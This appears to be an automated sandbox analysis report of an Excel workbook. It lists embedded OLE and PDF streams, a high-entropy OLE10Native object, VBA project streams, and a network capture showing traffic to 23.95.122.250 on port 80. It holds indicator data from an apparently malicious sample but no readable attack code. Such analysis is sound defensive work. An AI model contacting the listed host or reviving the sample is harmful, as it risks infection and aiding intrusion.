Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8a 90 cd 69 81 01 00 00 3a 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A264E/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A264E/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A264E/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD018A264E/\x1Ole
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 4 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 34 00

Stream Path: MBD018A264E/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 26959

General
Stream Path:	MBD018A264E/CONTENTS
File Type:	PDF document, version 1.7, 1 pages
Stream Size:	26959
Entropy:	6.845444704971999
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . . % . . 1 0 o b j . . < < / T y p e / C a t a l o g / P a g e s 2 0 R / L a n g ( e n - S G ) / S t r u c t T r e e R o o t 1 3 0 R / M a r k I n f o < < / M a r k e d t r u e > > / M e t a d a t a 3 3 0 0 R / V i e w e r P r e f e r e n c e s 3 3 1 0 R > > . . e n d o b j . . 2 0 o b j . . < < / T y p e / P a g e s / C o u n t 1 / K i d s [ 4 0 R ] > > . . e n d o b j . . 3 0 o b j . . < < / A u t h o r ( . I . C . R ) / C r e a t i o n
Data Raw:	25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 53 47 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 33 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 33 33 30 20 30

Stream Path: MBD018A264F/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A264F/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A264F/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD018A264F/\x1Ole
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 3 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 33 00

Stream Path: MBD018A264F/CONTENTS, File Type: PDF document, version 1.3, 2 pages, Stream Size: 119490

General
Stream Path:	MBD018A264F/CONTENTS
File Type:	PDF document, version 1.3, 2 pages
Stream Size:	119490
Entropy:	7.966513827870786
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 3 . % . . 9 0 o b j . < < . / L i n e a r i z e d 1 . / O 1 1 . / H [ 9 5 5 2 2 0 ] . / L 1 1 9 4 9 0 . / E 1 1 4 7 0 9 . / N 2 . / T 1 1 9 1 9 3 . > > . e n d o b j . x r e f . 9 2 6 . 0 0 0 0 0 0 0 0 1 6 0 0 0 0 0 n . . 0 0 0 0 0 0 0 8 6 5 0 0 0 0 0 n . . 0 0 0 0 0 0 1 1 7 5 0 0 0 0 0 n . . 0 0 0 0 0 0 1 3 2 8 0 0 0 0 0
Data Raw:	25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0a 39 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 31 31 20 0d 2f 48 20 5b 20 39 35 35 20 32 32 30 20 5d 20 0d 2f 4c 20 31 31 39 34 39 30 20 0d 2f 45 20 31 31 34 37 30 39 20 0d 2f 4e 20 32 20 0d 2f 54 20 31 31 39 31 39 33 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD018A2650/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A2650/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2650/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD018A2650/\x1Ole
File Type:	data
Stream Size:	62
Entropy:	2.746580382095154
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 2 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 32 00

Stream Path: MBD018A2650/CONTENTS, File Type: PDF document, version 1.4, 2 pages, Stream Size: 34853

General
Stream Path:	MBD018A2650/CONTENTS
File Type:	PDF document, version 1.4, 2 pages
Stream Size:	34853
Entropy:	7.532704890578007
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 4 . % . . 9 0 o b j . < < / L i n e a r i z e d 1 / L 3 4 8 5 3 / O 1 1 / E 2 5 6 6 1 / N 2 / T 3 4 6 2 7 / H [ 9 3 6 2 3 2 ] > > . e n d o b j . . . x r e f . . 9 3 2 . . 0 0 0 0 0 0 0 0 1 6 0 0 0 0 0 n . . 0 0 0 0 0 0 1 1 6 8 0 0 0 0 0 n . . 0 0 0 0 0 0 1 2 4 6 0 0 0 0 0 n . . 0 0 0 0 0 0 1 4 2 5 0 0 0 0 0 n . . 0 0 0 0 0 0 1 6 2 8 0 0 0 0 0 n . . 0 0 0 0 0 0 2 1 6 9 0 0 0 0 0 n . . 0 0 0 0 0 0 2 3 2 2 0
Data Raw:	25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 33 34 38 35 33 2f 4f 20 31 31 2f 45 20 32 35 36 36 31 2f 4e 20 32 2f 54 20 33 34 36 32 37 2f 48 20 5b 20 39 33 36 20 32 33 32 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 39 20 33 32 0d 0a

Stream Path: MBD018A2651/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A2651/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2651/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD018A2651/\x1Ole
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 1 2 7 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 31 32 37 00

Stream Path: MBD018A2651/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 26959

General
Stream Path:	MBD018A2651/CONTENTS
File Type:	PDF document, version 1.7, 1 pages
Stream Size:	26959
Entropy:	6.845444704971999
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . . % . . 1 0 o b j . . < < / T y p e / C a t a l o g / P a g e s 2 0 R / L a n g ( e n - S G ) / S t r u c t T r e e R o o t 1 3 0 R / M a r k I n f o < < / M a r k e d t r u e > > / M e t a d a t a 3 3 0 0 R / V i e w e r P r e f e r e n c e s 3 3 1 0 R > > . . e n d o b j . . 2 0 o b j . . < < / T y p e / P a g e s / C o u n t 1 / K i d s [ 4 0 R ] > > . . e n d o b j . . 3 0 o b j . . < < / A u t h o r ( . I . C . R ) / C r e a t i o n
Data Raw:	25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 53 47 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 33 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 33 33 30 20 30

Stream Path: MBD018A2652/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A2652/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2652/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD018A2652/\x1Ole
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 1 2 6 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 31 32 36 00

Stream Path: MBD018A2652/CONTENTS, File Type: PDF document, version 1.3, 2 pages, Stream Size: 119490

General
Stream Path:	MBD018A2652/CONTENTS
File Type:	PDF document, version 1.3, 2 pages
Stream Size:	119490
Entropy:	7.966513827870786
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 3 . % . . 9 0 o b j . < < . / L i n e a r i z e d 1 . / O 1 1 . / H [ 9 5 5 2 2 0 ] . / L 1 1 9 4 9 0 . / E 1 1 4 7 0 9 . / N 2 . / T 1 1 9 1 9 3 . > > . e n d o b j . x r e f . 9 2 6 . 0 0 0 0 0 0 0 0 1 6 0 0 0 0 0 n . . 0 0 0 0 0 0 0 8 6 5 0 0 0 0 0 n . . 0 0 0 0 0 0 1 1 7 5 0 0 0 0 0 n . . 0 0 0 0 0 0 1 3 2 8 0 0 0 0 0
Data Raw:	25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0a 39 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 31 31 20 0d 2f 48 20 5b 20 39 35 35 20 32 32 30 20 5d 20 0d 2f 4c 20 31 31 39 34 39 30 20 0d 2f 45 20 31 31 34 37 30 39 20 0d 2f 4e 20 32 20 0d 2f 54 20 31 31 39 31 39 33 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD018A2653/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A2653/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2653/\x1Ole, File Type: data, Stream Size: 64

General
Stream Path:	MBD018A2653/\x1Ole
File Type:	data
Stream Size:	64
Entropy:	2.892622069467395
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 1 2 3 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 31 32 33 00

Stream Path: MBD018A2653/CONTENTS, File Type: PDF document, version 1.4, 2 pages, Stream Size: 34853

General
Stream Path:	MBD018A2653/CONTENTS
File Type:	PDF document, version 1.4, 2 pages
Stream Size:	34853
Entropy:	7.532704890578007
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 4 . % . . 9 0 o b j . < < / L i n e a r i z e d 1 / L 3 4 8 5 3 / O 1 1 / E 2 5 6 6 1 / N 2 / T 3 4 6 2 7 / H [ 9 3 6 2 3 2 ] > > . e n d o b j . . . x r e f . . 9 3 2 . . 0 0 0 0 0 0 0 0 1 6 0 0 0 0 0 n . . 0 0 0 0 0 0 1 1 6 8 0 0 0 0 0 n . . 0 0 0 0 0 0 1 2 4 6 0 0 0 0 0 n . . 0 0 0 0 0 0 1 4 2 5 0 0 0 0 0 n . . 0 0 0 0 0 0 1 6 2 8 0 0 0 0 0 n . . 0 0 0 0 0 0 2 1 6 9 0 0 0 0 0 n . . 0 0 0 0 0 0 2 3 2 2 0
Data Raw:	25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 33 34 38 35 33 2f 4f 20 31 31 2f 45 20 32 35 36 36 31 2f 4e 20 32 2f 54 20 33 34 36 32 37 2f 48 20 5b 20 39 33 36 20 32 33 32 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 39 20 33 32 0d 0a

Stream Path: MBD018A2654/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A2654/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2654/\x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	MBD018A2654/\x1Ole
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2654/CONTENTS, File Type: PDF document, version 1.4, 1 pages, Stream Size: 78819

General
Stream Path:	MBD018A2654/CONTENTS
File Type:	PDF document, version 1.4, 1 pages
Stream Size:	78819
Entropy:	7.978778016988502
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 4 . % . 1 0 o b j . < < . / C r e a t i o n D a t e ( D : 2 0 2 3 0 3 1 7 0 7 2 8 5 2 + 0 0 ' 0 0 ' ) . / C r e a t o r ( P D F s h a r p 1 . 5 0 . 5 1 4 7 \\ ( w w w . p d f s h a r p . c o m \\ ) ) . / P r o d u c e r ( P D F s h a r p 1 . 5 0 . 5 1 4 7 \\ ( w w w . p d f s h a r p . c o m \\ ) ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 3 0 R . > > . e n d o b j . 3 0 o b j . < < . / T y p e / P a g e s . / C o u n t 1 . / K i d
Data Raw:	25 50 44 46 2d 31 2e 34 0a 25 d3 f4 cc e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 28 44 3a 32 30 32 33 30 33 31 37 30 37 32 38 35 32 2b 30 30 27 30 30 27 29 0a 2f 43 72 65 61 74 6f 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 30 2e 35 31 34 37 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 2f 50 72 6f 64 75 63 65 72 28 50 44 46

Stream Path: MBD018A2655/\x1CompObj, File Type: data, Stream Size: 93

General
Stream Path:	MBD018A2655/\x1CompObj
File Type:	data
Stream Size:	93
Entropy:	4.2892020709435155
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2655/\x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	MBD018A2655/\x1Ole
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD018A2655/CONTENTS, File Type: PDF document, version 1.4, 1 pages, Stream Size: 78819

General
Stream Path:	MBD018A2655/CONTENTS
File Type:	PDF document, version 1.4, 1 pages
Stream Size:	78819
Entropy:	7.978778016988502
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 4 . % . 1 0 o b j . < < . / C r e a t i o n D a t e ( D : 2 0 2 3 0 3 1 7 0 7 2 8 5 2 + 0 0 ' 0 0 ' ) . / C r e a t o r ( P D F s h a r p 1 . 5 0 . 5 1 4 7 \\ ( w w w . p d f s h a r p . c o m \\ ) ) . / P r o d u c e r ( P D F s h a r p 1 . 5 0 . 5 1 4 7 \\ ( w w w . p d f s h a r p . c o m \\ ) ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 3 0 R . > > . e n d o b j . 3 0 o b j . < < . / T y p e / P a g e s . / C o u n t 1 . / K i d
Data Raw:	25 50 44 46 2d 31 2e 34 0a 25 d3 f4 cc e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 28 44 3a 32 30 32 33 30 33 31 37 30 37 32 38 35 32 2b 30 30 27 30 30 27 29 0a 2f 43 72 65 61 74 6f 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 30 2e 35 31 34 37 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 2f 50 72 6f 64 75 63 65 72 28 50 44 46

Stream Path: MBD018A2656/\x1OLE10NATiVe, File Type: data, Stream Size: 1399

General
Stream Path:	MBD018A2656/\x1OLE10NATiVe
File Type:	data
Stream Size:	1399
Entropy:	7.779299937073449
Base64 Encoded:	False
Data ASCII:	. . . . . . . ^ > . t ~ 6 . * . O . U . 9 j L . ' I J C . * F . t . . a } . . $ u y . ! 2 X m o . s . \| D G S . / ` + ~ j l 4 . b 8 . . f - . . I . f e . . . . . 4 ' S . # i E K . I . 4 I t T O ) K ' \\ S . . E g I . . . . . . . . k . A . . . . . O x m s Q . . . . h j . . H . . . P X * P t . . Y . . . . . i y m i Y 1 ( . X 0 . 9 . S P S . J . . . . 2 . . D Y . . X . . : T . . [ X [ . b . . . . k . . . r . . . . . 3 x G z n m . U . . L , . H . d D j L . = . V 6 D . C ; . g G q . . ] 1 M . . L + Q .
Data Raw:	86 d6 d6 00 02 ae 1c 8e 17 94 01 08 1f 95 ba 5e 3e 0f 74 81 c2 de 7e 36 8c 8b 12 8b 2a b9 90 a3 09 89 81 f1 20 c4 4f 89 8b 11 55 ff d2 05 39 6a 4c d8 05 91 96 b3 27 ff e0 49 4a a6 43 00 2a 46 a4 0a f2 74 b7 c6 ac ef dd e8 20 08 61 e3 d8 7d d6 1c c1 e2 95 07 24 75 8e ee 90 79 0e 21 32 58 6d da 6f 06 73 01 bf 7c 44 47 53 b8 92 94 cf 94 2f d5 cb f2 60 b5 b8 9a c2 2b 81 94 be 8b f9 7e

Stream Path: MBD018A2656/\x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	MBD018A2656/\x1Ole
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 679964

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	679964
Entropy:	7.894783258392138
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . . . . . . . " . . . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	521
Entropy:	5.21061727645541
Base64 Encoded:	True
Data ASCII:	I D = " { B 1 2 3 E D D 9 - A A 0 E - 4 4 9 5 - B E 0 B - 1 E B 0 C 0 6 9 E 6 2 A } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 9 0 B 0 1 1 7 0 5 1 7 0 5 1 7 0
Data Raw:	49 44 3d 22 7b 42 31 32 33 45 44 44 39 2d 41 41 30 45 2d 34 34 39 35 2d 42 45 30 42 2d 31 45 42 30 43 30 36 39 45 36 32 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2023 12:56:33.427187920 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:33.546310902 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:33.546461105 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:33.547269106 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:33.697938919 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:33.698106050 CEST	49171	80	192.168.2.22	23.95.122.250
May 16, 2023 12:56:33.698133945 CEST	80	49171	23.95.122.250	192.168.2.22
May 16, 2023 12:56:33.698158979 CEST	80	49171	23.95.122.250	192.168.2.22
